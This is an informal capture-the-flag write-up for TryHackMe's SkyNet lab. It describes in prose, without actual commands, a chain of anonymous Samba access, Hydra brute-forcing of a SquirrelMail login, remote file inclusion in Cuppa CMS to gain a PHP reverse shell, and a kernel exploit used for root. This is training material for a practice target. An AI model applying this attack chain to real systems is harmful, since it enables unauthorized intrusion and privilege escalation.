SkyNet (TryHackMe) WriteUp

OK, let's compromise?the machine. After deploy the machine, im heading over to check it. let's browser it and see what it is first.

looks like some searching site, reminds google a little bit. I chacked the source of this page, but nothing really came up. OK, let's find some hidden directory ( if there are any), and see what clues can we get.

OK, we have some differents directories. after checking all of them, it seems only the lest one is the one we are looking for ( are we? )

When i went over there, the next page apears.

A SquirrelMail version 1.4.23. it has a name and a password. it seems like this page works very fine, and the correct username and password, will bring us in as i suppose. OK, for now we only have this Squirremail version 1.4.23 and nothing else beside some other directories which we are not allowed to access. Let's scan this machine and look for some open ports.

Nmap scan shows interesting results. we can see port 22 is open, and also ports 139/445. we can see it runs samba and it actually lets anonymous user get in. let's try to connect to it with this with just "anonymous" and see if we can find anything.

Nice! we managed to enter with anonymous user. Download the files to you're local machine and see if they will give us more clues that would help us fnish this challenge.

the "attentions" file ends with the name Miles Dyson. it alerts about some malfunction that caused passwords to be changed. the other ones. "log2.txt" contains some words. seems like a password-file. "log3.txt" contains nothing. OK, so what do we have? a login page which run on Squirrelmail, name, open ports and some file contains words seems like passwords.

When running enumlinux, is shows a share directory (Miles Dyson Personal Share) names milesdyson. now, after did our search, collecting information, let's try to get back to the login page and try to brute-force with the username milesdyson. see if we can get in.

Now, we can use two ways of brute-force. the first is by using Burp-suite for catching the data sends to connections, and then sends it to the intruder tab, and put the payloads we wants, and start the proccess.

second, is using hydra with the http-post-forms. we actually tells hydra how we want it, and what we want it to find. so for this, i decide using hydra with the command that will try brute-force the username. let's see if we got it!

Yes! after getting the miles password, we can log in to the smb share we found earlier, remember? let's log in and see for another clues.

OK, after we are in, we see some files/directories. Navigate to the notes one, and there are more files but one seemed odd. can you gues which one? good. use get to download it to you're local machine, and...bling! we got the hidden directory.

So, after another scan with gobuster, a Cuppa CMS system reveals. After some checking for any vulnerability, i found that is is vulnerable to php code injection, which an attacker can include a remote/local php files. This vulnerability can lead to full server compromise.

https://www.exploit-db.com/exploits/25971

OK, now that we know there is an exploit, we can try "upload" ( we use the vulnerability to connect the site to our payload) a PHP reverse-shell to the server, and by that, gain access to it using our own listening port.

get a reverse-shell from github, search for pentestmonkey or other one that works, change ip and port. open netcat to listen on the port you picked, and make use python3 on port 80. After done it, you sould get a shell!

ok, we got the flag. let's try to make privilege escalation. After some search, i found that milesdyson has in his home directory a backupsh file that runs every minute from the crontab, but i dont have write permission to it, so i keep search until i found that the command uname -a reveals the system is using a Linux 4.8.0-58-generic. I search for an exploit, and found that is has one, so i decided to give it a try and use it.

I Download the exploit using the "wget" command from my local machine, to the remote machine, and hope this thing will work. Note: Download it to the /tmp directory, otherwise the command will not work because permissions. Using the gcc command to complie the script, and chmod +x, gave me a root, so it did work!